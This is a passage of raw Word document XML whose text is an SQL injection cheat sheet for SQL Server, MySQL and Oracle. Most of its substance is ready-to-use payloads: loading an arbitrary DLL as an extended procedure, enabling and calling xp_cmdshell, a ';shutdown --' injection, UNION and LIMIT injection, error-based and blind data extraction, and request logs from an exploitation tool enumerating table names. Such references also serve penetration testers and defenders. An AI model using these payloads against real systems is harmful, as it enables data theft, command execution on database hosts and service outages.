          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>xp_ntsec_enumdomains</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181C5EA3"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Process Killing (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>need PID</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>) (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>xp_terminate_process</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13675DFF"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Add new procedure (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>virtually you can execute whatever you want</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sp_addextendedproc 'xp_webserver', 'c:\temp\x.dll' </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>exec xp_webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8DBDC0" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Write text file to a UNC or an internal path (sp_makewebtask)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB55ED7"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MSSQL Bulk Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7804541D"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 FROM master..sysprocesses /*WHERE spid=@@SPID*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591BE008"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lastRenderedPageBreak/>
        <w:t>DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6E8AB8"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HOST_NAME() </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>IS_MEMBER (Transact-SQL)  </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>IS_SRVROLEMEMBER (Transact-SQL)  </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>OPENDATASOURCE (Transact-SQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CC7954" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B34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00" w:right="300"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2357661B"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OPENROWSET (Transact-SQL)  - </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="007B3493">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="3E3E3E"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://msdn2.microsoft.com/en-us/library/ms190312.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6AF4E46F"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You can not use sub selects in SQL Server Insert queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEC733B"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SQL Injection in LIMIT (M) or ORDER (MSO)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0D707B"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id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A0F48D"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If injection is in second </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> you can comment it out or use in your union injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D2A536"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Shutdown SQL Server (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2018AFE2"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When you're really pissed off, </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>';shutdown --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E202B78"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bookmarkStart w:id="25" w:name="Enablecmdshell"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Enabling xp_cmdshell in SQL Server 2005</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6330878A"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By default xp_cmdshell and couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access then you can enable these.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CC972B"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lastRenderedPageBreak/>
        <w:t>EXEC sp_configure 'show advanced options',1 </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:br/>
        <w:t>RECONFIGURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED024E3"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EXEC sp_configure 'xp_cmdshell',1 </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:br/>
        <w:t>RECONFIGURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7223F141"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Finding Database Structure in SQL Server (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EB2DD1"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Getting User defined Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444997A6"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name FROM sysobjects WHERE xtype = 'U'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564B8449"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Getting Column Names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1EBB3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name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7800E686"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Moving records (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55988FB3" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>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Modify WHERE and use </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>NOT IN</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> or </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>NOT EXIST</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 WHERE users NOT IN ('First User', 'Second User')</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TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members)</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>-- very good one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CDAAF4" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>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Using Dirty Tricks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SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id&lt;=o.id) AS x, name from sysobjects o) as p where p.x=3) as int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lastRenderedPageBreak/>
        <w:br/>
        <w:t>Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id&lt;=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6524462E"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA52FFF"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Fast way to extract data from Error Based SQL Injections in SQL Server (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2F28F2"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';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name&gt;@rd SELECT @rd AS rd into TMP_SYS_TMP end;--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B42A78D"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t>Detailed Article: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="007B3493">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="3E3E3E"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Fast way to extract data from Error Based SQL Injections</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7722ABAE"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Finding Database Structure in MySQL (M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08211BF0"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Getting User defined Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7939850D"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table_name FROM information_schema.tables WHERE table_schema = 'databasename'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB22CC6"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Getting Column Names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046C74E3"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table_name, column_name FROM information_schema.columns WHERE table_name = 'tablename'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCCCA7B"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Finding Database Structure in Oracle (O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E80BC5A"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Getting User defined Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC6C993"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 FROM all_tables WHERE OWNER = 'DATABASE_NAME'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042FD011"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Getting Column Names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394DD07A"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 FROM all_col_comments WHERE TABLE_NAME = 'TABLE'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7943A9EA" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="750" w:after="450" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
        </w:rPr>
        <w:t>Blind SQL Injections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DA6ECB"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About Blind SQL Injections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD9341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In a quite good production application generally </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>you can not see error responses on the page</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>, so you can not extract data through Union attacks or error based attacks. You have to do use Blind SQL Injections attacks to extract data. There are two kind of Blind Sql Injections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B04818"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t>Normal Blind</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>, You can not see a response in the page, but you can still determine result of a query from response or HTTP status code </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Totally Blind</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>, You can not see any difference in the output in any kind. This can be an injection a logging function or similar. Not so common, though.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CAB695"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In normal blinds you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>if statements</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> or abuse </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>WHERE query in injection</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>generally easier</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>), in totally blinds you need to use some waiting functions and analyze response times. For this you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>WAITFOR DELAY '0:0:10' </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>in SQL Server, BENCHMARK() and </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>sleep(10)</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> in MySQL, </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>pg_sleep(10) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>in PostgreSQL, and some PL/SQL tricks in ORACLE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCB4154"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bookmarkStart w:id="26" w:name="BSQLAttackSamples"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Real and a bit Complex Blind SQL Injection Attack Sample</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C960D21"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This output taken from a real private Blind SQL Injection tool while exploiting SQL Server back ended application and enumerating table names. This requests done for first char of the first table name. SQL queries a bit more complex then requirement because of automation reasons. In we are trying to determine an ascii value of a char via binary search algorithm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03828E1F"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b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>FALSE</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> flags mark queries returned true or false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4292FAA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b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)&gt;78-- </w:t>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b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>FALSE</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)&gt;103-- </w:t>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b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) </w:t>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b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
